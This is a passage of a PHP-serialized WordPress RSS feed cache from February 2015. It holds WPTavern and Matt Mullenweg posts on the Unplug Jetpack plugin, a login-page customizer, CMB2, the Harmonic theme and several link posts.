title=\"http://jenmylo.com/2014/10/05/site-setup-journal-prologue/\" href=\"http://jenmylo.com/2014/10/05/site-setup-journal-prologue/\">site setup journal experiment</a>. In the series, Mylo documents what it’s like as a new user to install WordPress on a host, setup a website, and browse through documentation. <a title=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-i/\" href=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-i/\">Part 1</a> covers domains and hosting while <a title=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-ii/\" href=\"http://jenmylo.com/2014/10/11/site-setup-journal-act-ii/\">part 2</a> is about setting up WordPress. Her journey is an eye-opening experience and shows how many areas of WordPress are ripe for improvement.</p>\n<p>If WordPress is going to achieve <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\">50% market share</a>, it needs to be easy to install and use. The New User Experience initiative is a good step towards ensuring the future of WordPress adoption.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 19:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Matt: Fusion.net\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44663\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://ma.tt/2015/02/fusion-net/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:347:\"<p>There’s <a href=\"http://fusion.net/\">a relatively new site called Fusion.net that is definitely worth checking out</a>, it’s already full of great articles and they’re <a href=\"http://techmeme.com/lb\">starting to climb up the Techmeme Leaderboard</a>. They run on <a href=\"http://vip.wordpress.com/\">WordPress.com VIP</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 18:30:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: Unplug Jetpack: Use Jetpack Modules Without Connecting to WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38723\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://wptavern.com/unplug-jetpack-use-jetpack-modules-without-connecting-to-wordpress-com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2837:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/unplug.jpg\" rel=\"prettyphoto[38723]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/unplug.jpg?resize=1024%2C510\" alt=\"photo credit: Unplugged - (license)\" class=\"size-full wp-image-38734\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/23307937@N04/3415991748\">Unplugged</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Connecting a WordPress.com account in order to use Jetpack can be a hassle, especially when developing for clients or working on your local machine. If you like Jetpack but don’t want to connect to WordPress.com, there’s a new plugin that makes it easy to use the features that don’t require a connection.</p>\n<p><a href=\"https://wordpress.org/plugins/unplug-jetpack/\" target=\"_blank\">Unplug Jetpack</a> was created by WordPress developer <a href=\"http://tannermoushey.com/\" target=\"_blank\">Tanner Moushey</a>. With the plugin activated, you won’t be required to connect to WordPress.com unless you need to use Site stats, Publicize, Related Posts, etc. If you don’t see the module you’re looking for among the others, that means that it likely requires a WordPress.com connection in order to use it.</p>\n<p>The Unplug Jetpack plugin essentially puts Jetpack into development mode. Development mode was introduced in Jetpack <a href=\"http://jetpack.me/2013/03/28/jetpack-dev-mode-release/\" target=\"_blank\">2.2.1</a> to help developers with local testing. It allows you to use features that do not require a connection to WordPress.com servers. Ordinarily, turning on development mode requires adding a line to your wp-config.php file or employing the filter via a plugin.</p>\n<p>Unplug Jetpack is convenient, because it allows you to turn development mode on/off using a plugin. It uses the Jetpack-supported method for doing this and consists of just a couple lines of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\nfunction uj_init() {\n add_filter( \'jetpack_development_mode\', \'__return_true\' );\n}\nadd_action( \'plugins_loaded\', \'uj_init\' );\n</pre>\n<p>When asked whether or not the plugin offers a performance boost as opposed to using non-WordPress.com dependent modules with the connection to WordPress.com, Moushey <a href=\"https://twitter.com/tannermoushey/status/564189285071351808\" target=\"_blank\">said</a> that it’s unlikely to have a significant performance impact. “But that is not really the point of this,” he said. It’s the principle of the matter – being able to use Jetpack’s code without the requirement of connecting to a third party. <a href=\"https://wordpress.org/plugins/unplug-jetpack/\" target=\"_blank\">Unplug Jetpack</a> lets you do that with the flip of a switch.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 18:22:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"Matt: What is a Hacker?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44661\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/what-is-a-hacker/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"<p>Steven Levy asks <a href=\"https://medium.com/backchannel/what-is-a-hacker-51257cad8b54\">What is a Hacker? and gets some great answers back</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 01:08:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Matt: Productivity of Working from Home\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://ma.tt/2015/02/productivity-of-working-from-home/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:270:\"<p>FiveThirtyEight says <a href=\"http://fivethirtyeight.com/datalab/people-working-from-home-in-a-snowstorm-may-be-producing-more-than-you-are/\">People Working From Home In A Snowstorm May Be Producing More Than You Are</a>, on the productivity of working from home.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Feb 2015 03:41:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Tom Ford’s 15 Things\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44642\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/02/tom-fords-15-things/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1195:\"<p>For the <a href=\"http://www.vogue.co.uk/spy/15th-anniversary\">15th anniversary of Vogue.com</a> noted fashion designer Tom Ford made a list of 15 things that every man should have, which are as follow:</p>\n<ol>\n<li>A sense of humour.</li>\n<li>A daily read of a newspaper.</li>\n<li>A sport that you love and are good at.</li>\n<li>Tweezers.</li>\n<li>A good cologne that becomes a signature.</li>\n<li>A well cut dark suit.</li>\n<li>A pair of classic black lace up shoes.</li>\n<li>A smart blazer.</li>\n<li>The perfect pair of dark denim jeans.</li>\n<li>Lots of crisp white cotton shirts.</li>\n<li>Always new socks and underwear, throw away the old ones every 6 months.</li>\n<li>A classic tuxedo.</li>\n<li>A beautiful day watch with a metal band.</li>\n<li>The perfect sunglasses.</li>\n<li>Perfect teeth. If you don’t have them, save up and get them fixed.</li>\n</ol>\n<p>A pretty good list, though I would <a href=\"http://cir.ca/\">replace the newspaper with Circa</a>, and I must confess I’m not sure sure what #4 the tweezers are for.</p>\n<p><a href=\"http://om.co/2011/07/05/tom-ford-5-tips-to-be-a-modern-gentleman/\">Om also has Tom Ford’s 5 tips for a modern gentleman</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 23:49:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Customize Your Login Page Using the WordPress Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38581\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/customize-your-login-page-using-the-wordpress-customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2713:\"<p>As a result of the improvements to the Customizer API in WordPress 4.0 and 4.1, developers now have access to a wider array of controls and parameters that allow them to extend the feature for more varied uses beyond themes. The new <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Custom Login Customizer</a> plugin is a prime example of making the customizer available outside of a theme-related context.</p>\n<p>The plugin adds its own panel to the customizer with a myriad of options for customizing the design of your site’s login page.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg\" rel=\"prettyphoto[38581]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg?resize=987%2C572\" alt=\"login-customizer\" class=\"aligncenter size-full wp-image-38688\" /></a></p>\n<p>Custom Login Customizer allows you to customize nearly every aspect of the login form, including the following:</p>\n<ul>\n<li>Set a login logo, along with width, height, and padding</li>\n<li>Add a background, select background color and size</li>\n<li>Set a background for the form</li>\n<li>Adjust form styling – width, height, padding, border</li>\n<li>Style input field width, margin, background, and input/label colors</li>\n<li>Color picker for button background, border, hover background/border, button box shadow</li>\n<li>Select text colors</li>\n<li>Add custom CSS</li>\n</ul>\n<p>I tested the plugin and found it works smoothly as advertised. Once installed, navigate to Appearance > Login Customizer in order to launch your login page in the customizer while still being logged in.</p>\n<p>Custom Login Customizer was created by WordPress developer <a href=\"http://www.hardeepasrani.com/\" target=\"_blank\">Hardeep Asrani</a> and then sold to <a href=\"https://themeisle.com/\" target=\"_blank\">ThemeIsle.com</a> last week. “I believe Themeisle will most probably have a premium version with some more features in the future,” Asrani said. “However, the free plugin will still be there at the WordPerss.org repository and will have more features soon. At this moment, there’s no premium version or a plan for it.”</p>\n<p>There are many plugins out there which allow you to customize your login page. However, the advantage of using this particular one is that you can preview your changes live before saving them. This is one of the best uses of the customizer in a plugin that I have seen so far. It makes designing your login page an easy and enjoyable experience. Download the <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Login Customizer</a> from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 22:44:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Custom Metaboxes and Fields for WordPress (CMB2) Now Out of Beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38417\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/custom-metaboxes-and-fields-for-wordpress-cmb2-now-out-of-beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4291:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg\" rel=\"prettyphoto[38417]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg?resize=768%2C372\" alt=\"photo credit: Different types of wand cases stacked - (license)\" class=\"size-full wp-image-38683\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/22464562@N00/8084402724\">Different types of wand cases stacked</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The <a href=\"https://github.com/WebDevStudios/CMB2\" target=\"_blank\">Custom Metaboxes and Fields for WordPress (CMB2)</a> plugin is now officially out of beta and ready for public use. The tool was created to make it easy for developers to create metaboxes and forms with custom fields. Developers at <a href=\"http://webdevstudios.com/\" target=\"_blank\">WebDevStudios</a> took over the <a href=\"https://github.com/WebDevStudios/Custom-Metaboxes-and-Fields-for-WordPress\" target=\"_blank\">original CMB GitHub repository</a> from Jared Atchison, its original creator, in December of 2013.</p>\n<p>Justin Sternberg <a href=\"http://webdevstudios.com/2015/02/02/cmb2-wordpress-plugin/\" target=\"_blank\">explained</a> why WebDevStudios chose to start contributing to the CMB2 project:</p>\n<blockquote><p>After having been burned by some issues with other custom field plugins, we determined it was best to stick with code that we had some control over. We fell in love with CMB because it was a library we could include in any of our projects and it would just work while letting us keep all of the field configuration in the code, and more importantly, in our version control system.</p></blockquote>\n<p>Due to irreconcilable shortcomings in the original CMB, WebDevStudios opted to fork the project and create a new one that wouldn’t have the same backwards compatibility requirements. If you used CMB in the past, it’s important to note that the new CMB2 project has renamed every class, function, hook, and filter in the library to avoid conflicts with the original. It’s essentially a complete re-write.</p>\n<p>“CMB2 was built with a new mechanism to ensure it only loads the most recent version of CMB2 in your system,” Sternberg said. “This ensures that a plugin with an old bundled version will not conflict or take precedence over your up-to-date version.”</p>\n<p>The new <a href=\"https://wordpress.org/plugins/cmb2/\" target=\"_blank\">CMB2 is now available on WordPress.org</a> as a plugin for easy activation when you want to use it with one of your projects. As an alternative, you can <a href=\"https://github.com/WebDevStudios/CMB2/blob/master/example-functions.php#L14\" target=\"_blank\">include CMB2 directly</a>. The newly released plugin features the following:</p>\n<ul>\n<li>Create metaboxes to be used on post edit screens.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Using-CMB-to-create-an-Admin-Theme-Options-Page\" target=\"_blank\">Create forms to be used on an options pages.</a></li>\n<li>Create forms to handle user meta and display them on user profile add/edit pages.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Bringing-Metaboxes-to-the-Front-end\" target=\"_blank\">Flexible API that allows you to use CMB forms almost anywhere, even on the front-end</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Field-Types#types\" target=\"_blank\">30+ built-in field types</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Adding-your-own-field-types\" target=\"_blank\">Custom API hook that allows you to create your own field types</a></li>\n<li>Numerous hooks and filters, allowing you to modify many aspects of the library (without editing it directly)</li>\n<li>Repeatable fields for most field types are supported, as well as repeatable field groups</li>\n</ul>\n<p>The WebDevStudios team plans to maintain strict backwards compatibility moving forward, as of CMB2’s 2.0.1 release on WordPress.org. If you want to include CMB2 as part of your next project, make sure to check out the plugin’s <a href=\"https://github.com/WebDevStudios/CMB2/wiki\" target=\"_blank\">wiki and code library</a> for tips on how to add metaboxes, fields, and forms to WordPress themes and plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 21:05:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Harmonic: A Bold Free WordPress Theme for Artists and Bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38617\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/harmonic-a-bold-free-wordpress-theme-for-artists-and-bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3114:\"<p>If you like designs that feature stunning, fullscreen background images, then Automattic’s latest free theme release is a prime candidate for your next blog redesign. <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> recently landed on WordPress.org and is rapidly closing in on 3,000 downloads.</p>\n<p>This theme puts the spotlight on your images and content. Harmonic’s striking homepage is accompanied by a minimalist, one-column blog design and an optional portfolio page template.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png?resize=880%2C660\" alt=\"harmonic\" class=\"aligncenter size-full wp-image-38619\" /></a></p>\n<p>Each section of the scrolling front page has options in the customizer that let you assign a unique display. The customizer allows you to easily set a background for the news, page, widgets, and portfolio sections. You can even include a background shade so that the title and tagline are more readable. The Visibility options allow you to hide any of the sections you’re not currently using.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png?resize=1025%2C542\" alt=\"harmonic-customizer\" class=\"aligncenter size-full wp-image-38629\" /></a></p>\n<p>Single posts and pages with a featured image will display in a fullscreen design similar to the homepage. The blog archive is available with your choice of a one or two-column layout.</p>\n<p>With the addition of Jetpack, Harmonic also supports site logo upload and a portfolio. The customizer includes options for three different thumbnail aspect ratios, including: landscape (4:3), portrait (3:4), and square (1:1).</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg?resize=1025%2C748\" alt=\"media\" class=\"aligncenter size-full wp-image-38635\" /></a></p>\n<p>Harmonic includes a custom menu for social links and has support for 16 different social networks. Check out the <a href=\"https://harmonicdemo.wordpress.com/\" target=\"_blank\">live demo</a> on WordPress.com to see the theme in action.</p>\n<p>With the release of <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> for self-hosted sites, Automattic now has 60 free themes available in the directory. This theme caters to visual artists and bloggers who have large images to showcase in the background, portfolio, or gallery sections of the site.</p>\n<p>Harmonic is unique in that it transforms featured images and titles into a splash page style intro to single posts. If you want to use images to make a strong impact on your reader, this theme fits the bill. It’s available on both WordPress.com and self-hosted WordPress sites via the admin themes browser.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 08:19:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n 